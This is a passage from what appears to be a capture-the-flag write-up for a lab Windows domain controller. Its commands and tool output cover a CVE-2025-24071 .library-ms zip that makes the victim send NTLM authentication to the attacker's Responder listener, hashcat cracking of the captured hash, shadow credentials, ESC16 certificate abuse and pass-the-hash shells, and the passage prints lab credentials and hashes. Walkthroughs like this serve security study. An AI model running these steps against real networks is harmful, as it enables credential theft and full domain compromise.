                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
  32
    Template Name                       : User
    Display Name                        : User
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Users
                                          FLUFFY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : FLUFFY.HTB\Domain Users
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.

I don’t need to spend too much time on this now, though I could come back and look more closely if I don’t see a path forward.

Bloodhound

I’ll use BloodHound.py to collect Bloodhound data:

oxdf@hacky$ bloodhound-ce-python -c all -d fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250522022823_bloodhound.zip

I’ll start Bloodhound Docker and upload the zip archive.

I’ll start with j.fleischman and mark them owned:

image-20250521153046559

They have no interesting outbound control.

SMB - TCP 445

In addition to the standard SMB shares on a Windows domain controller, there’s a share named IT that j.fleischman has read / write access to:

oxdf@hacky$ netexec smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 

I’ll connect to the IT share and there’s a few files:

oxdf@hacky$ smbclient  '//10.10.11.69/IT' -U 'j.fleischman%J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 22 02:34:25 2025
  ..                                  D        0  Thu May 22 02:34:25 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 15:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 15:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 15:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 15:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 14:31:07 2025

                5842943 blocks of size 4096. 1465188 blocks available

There are two zip files that seem to be extracted. And a PDF, which I’ll download:

smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (245.5 KiloBytes/sec) (average 245.5 KiloBytes/sec)

The PDF has two pages about an upcoming update window:

image-20250521154356886

There’s an email address at the end:

image-20250521154424671

Auth as p.agila

CVE-2025-24071 / CVE-2025-24054

Identification

Typically these kinds of lists of CVEs on CTFs are clues as to where to look. Reviewing the list, CVE-2025-24071 was big in the news around March 2025:

image-20250521154645776

It also has to do with Zip archives, which I already noted a couple of in the share.

Background

The Nist description of this CVE is very weak:

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

It turns out the Microsoft initially requested CVE-2025-27071, but later updated it to CVE-2025-24054.

Luckily, this was a pretty popular vulnerability when it came out, and there are many other articles (like this and this] explain it in depth.

There’s a flaw in Windows Explorer and how it processes a Zip or Rar archive with a maliciously crafted .library-ms file inside it. When this malicious file is extracted or interacted with, it will trigger an NTLM authentication attempt to an attacker controlled server:

Initial reports suggested that exploitation occurred once the .library-ms file was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability, CVE-2024-43451, as both share several similarities.

Exploit

There are several POCs out for this vulnerability as of the release of Fluffy. I’ll grab this one from Marcejr117 and copy the poc.py file to my host.

I’ll run the script with uv (see my uv cheatsheet for more details):

oxdf@hacky$ uv run --script poc.py 0xdf 10.10.14.6

[+] File 0xdf.library-ms created successfully.

It creates a exploit.zip file which contains a 0xdf.library-ms file:

oxdf@hacky$ unzip -l exploit.zip 
Archive:  exploit.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      364  2025-05-21 20:04   0xdf.library-ms
---------                     -------
      364                     1 file

Because the goal of this exploit is to get the victim to try to authenticate to my host, I’ll start Responder:

oxdf@hacky$ sudo uv run /opt/Responder/Responder.py -I tun0
...[snip]...

I’ll upload the exploit to the SMB share:

smb: \> put exploit.zip 
putting file exploit.zip as \exploit.zip (0.8 kb/s) (average 0.9 kb/s)
smb: \> ls
  .                                   D        0  Thu May 22 03:12:06 2025
  ..                                  D        0  Thu May 22 03:12:06 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 15:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 15:04:05 2025
  exploit.zip                         A      316  Thu May 22 03:12:07 2025
  KeePass-2.58                        D        0  Fri Apr 18 15:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 15:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 14:31:07 2025

                5842943 blocks of size 4096. 1688505 blocks available

Less than a minute later, it’s been extracted:

smb: \> ls
  .                                   D        0  Thu May 22 03:12:29 2025
  ..                                  D        0  Thu May 22 03:12:29 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 15:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 15:04:05 2025
  exploit                             D        0  Thu May 22 03:12:30 2025
  exploit.zip                         A      316  Thu May 22 03:12:07 2025
  KeePass-2.58                        D        0  Fri Apr 18 15:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 15:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 14:31:07 2025

                5842943 blocks of size 4096. 1688405 blocks available

And then there’s contact at Responder from Fluffy:

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:f67da47ac52b4d7b:143C3425DC8AC6BFEF42B719CA41C173:01010000000000008057D628C7CADB012A238DF04572E5670000000002000800510050003300320001001E00570049004E002D003300510030005A004F005400340045004A004A00300004003400570049004E002D003300510030005A004F005400340045004A004A0030002E0051005000330032002E004C004F00430041004C000300140051005000330032002E004C004F00430041004C000500140051005000330032002E004C004F00430041004C00070008008057D628C7CADB010600040002000000080030003000000000000000010000000020000028FE1C4585CB6A70254F0F619A4728E9E5CC246FDF1BF22B25ACE1C6B05FA9F60A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila

Crack Hash

hashcat

This hash is a Net-NTLMv2 hash. It’s actually not a hash at all, but a cryptographic challenge and response. Unlike a NTLM hash, a Net-NTLMv2 has cannot be passed as a form of authentication. It can be relayed or cracked. Given that there’s only one host here, and typically it doesn’t work to relay to the originating host, I’ll try cracking.

I’ll have the “hash” into a file, and pass it to hashcat. hashcat can identify the format automatically and cracks it in seconds:

$ hashcat p.agila.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol
...[snip]...
P.AGILA::FLUFFY:f67da47ac52b4d7b:143c3425dc8ac6bfef42b719ca41c173:01010000000000008057d628c7cadb012a238df04572e5670000000002000800510050003300320001001e00570049004e002d003300510030005a004f005400340045004a004a00300004003400570049004e002d003300510030005a004f005400340045004a004a0030002e0051005000330032002e004c004f00430041004c000300140051005000330032002e004c004f00430041004c000500140051005000330032002e004c004f00430041004c00070008008057d628c7cadb010600040002000000080030003000000000000000010000000020000028fe1c4585cb6a70254f0f619a4728e9e5cc246fdf1bf22b25ace1c6b05fa9f60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:prometheusx-303
...[snip]...

Verification

I’ll make sure this password works:

oxdf@hacky$ netexec smb dc01.fluffy.htb -u p.agila -p 'prometheusx-303'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\p.agila:prometheusx-303 

It doesn’t work for WinRM:

oxdf@hacky$ netexec winrm dc01.fluffy.htb -u p.agila -p 'prometheusx-303'
WINRM       10.10.11.69     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) 
WINRM       10.10.11.69     5985   DC01             [-] fluffy.htb\p.agila:prometheusx-303

Shell as winrm_svc

Enumeration

I’ll mark p.agila owned in Bloodhound, and look at their outbound object control:

image-20250521164629621

Their being a member of Service Account Managers gives them GenericAll over the Service Accounts group. Clicking on that group and looking at its outbound control, it has GenericWrite over three accounts:

image-20250521164803692

winrm_svc is a member of the Remote Management Users group:

image-20250521164856735

I could also see this all at once by going to the Cypher tab in Bloodhound, clicking the folder icon to open the pre-built queries, and selecting “Shortest paths from Owned objects”:

image-20250521165041183

I’ll explore ca_svc later, but first I’m going to winrm_svc.

Recover NTLM for winrm_svc

Add p.agila to Service Accounts

I’ll start by adding the p.agila user to the Service Accounts group. This is easily done with multiple different tools. I’ll use BloodyAD:

oxdf@hacky$ bloodyAD -u p.agila -p prometheusx-303 -d fluffy.htb --host dc01.fluffy.htb add groupMember 'service accounts' p.agila
[+] p.agila added to service accounts 

Shadow Credential

Now p.agila should have GenericWrite over winrm_svc. With GenericWrite over a user, I can targeted Kerberoast (give the user a SPN, get a hash, and try to break it to get their password), change their password, or add a shadow credential. I’ll go for the shadow credential using certipy:

oxdf@hacky$ certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account winrm_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ce14ad2d-fb9d-1e9b-9fdb-a3aac3abbebd'
[*] Adding Key Credential with device ID 'ce14ad2d-fb9d-1e9b-9fdb-a3aac3abbebd' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'ce14ad2d-fb9d-1e9b-9fdb-a3aac3abbebd' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

This command both returns a Kerberos TGT which I can use to authenticate, and the NTLM hash for the account.

I’ll grab the same for ca_svc:

oxdf@hacky$ certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account ca_svc
...[snip]...
[*] Saved credential cache to 'ca_svc.ccache'
...[snip]...
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

WinRM

With the NTLM hash, I can get a WinRM session using evil-winrm-py:

oxdf@hacky$ evil-winrm-py -i dc01.fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
        ▘▜      ▘             
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v0.0.8
[*] Connecting to dc01.fluffy.htb:5985 as winrm_svc
evil-winrm-py PS C:\Users\winrm_svc\Documents>

And user.txt:

evil-winrm-py PS C:\Users\winrm_svc\desktop> cat user.txt
e3f68cd8************************

Shell as Administrator

Enumeration

Bloodhound

Members of the Service Accounts group have GenericWrite over the ca_svc user, who is a member of the Cert Publishers Group which is a member of the Denied RODC Password Replication Group.

image-20250521171512063

The Denied RODC Password Replication Group is a well known group that prevents passwords of its members from being cached on Read-Only Domain Controllers (RODCs). This membership doesn’t reveal an exploitation path, but it does show that this is a valuable group.

ADCS

The name of the user and the group are great hints to look at ADCS. I’ll use certipy to look for vulnerabilities:

oxdf@hacky$ certipy find -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates

The output looks similar to what I ran it previously, but this time it’s calling out ESC16. It’s important to note that ESC16 was only added to certipy in this commit, less than two weeks before Fluffy released, so it’s important to make sure certipy is updated (when I first ran, my version 4.8.2 didn’t find anything - only after uv tool upgrade certipy did it find it).

Members of Cert Publishers can Enroll in any certificate generated by the CA.

ESC16

Background

The certipy Wiki has a nice section on ESC16, which occurs when the CA itself is globally configured to disable the inclusion of the szOID_NTDS_CA_SECURITY_EXT security extension for all certificates it issues. This extension is responsible for “strong certificate mapping”, and without it, I can modify a user such that it can get an certificate as any user.

With GenericWrite over an account, I’ll change it’s user principal name (UPN) to the target account’s username (such as administrator). Then I’ll request a certificate as the controlled user, and when it sees the UPN of the target, it will return a certificate with that name in it, allowing me to authenticate as that target user.

Update UPN

I have hashes for multiple members of the service accounts group, and each has GenericWrite over the others. The ca_svc account, because it’s in Cert Publishers, is able to enroll in any certificate. I’ll work from winrm_svc and modify ca_svc, following the steps laid out in the wiki. To start, ca_svc has the following attributes:

oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-22T04:19:48+00:00

Specifically, the UPN is “ca_svc@fluffy.htb”.

I’ll update that to “administrator”:

oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn administrator update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'
oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-22T07:17:25+00:00

Request Certificate

Now I need to request a certificate as ca_svc:

oxdf@hacky$ certipy req -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 18
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

If the security extension had been in place, it would not trust this mismatched UPN. But without it, it will return a certificate with a UPN of administrator.

Now I can clean up and set the UPN back to what it was:

oxdf@hacky$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn ca_svc@fluffy.htb update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

Request Auth

With the certificate, I’ll use certipy auth to get a ticket and NTLM:

oxdf@hacky$ certipy auth -dc-ip 10.10.11.69 -pfx administrator.pfx -u administrator -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

Shell

I’ll use that hash to get a WinRM shell:

oxdf@hacky$ evil-winrm-py -i dc01.fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
        ▘▜      ▘             
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v0.0.8
[*] Connecting to dc01.fluffy.htb:5985 as administrator
evil-winrm-py PS C:\Users\Administrator\Documents>

And root.txt:

evil-winrm-py PS C:\Users\Administrator\desktop> cat root.txt
c3a85f56************************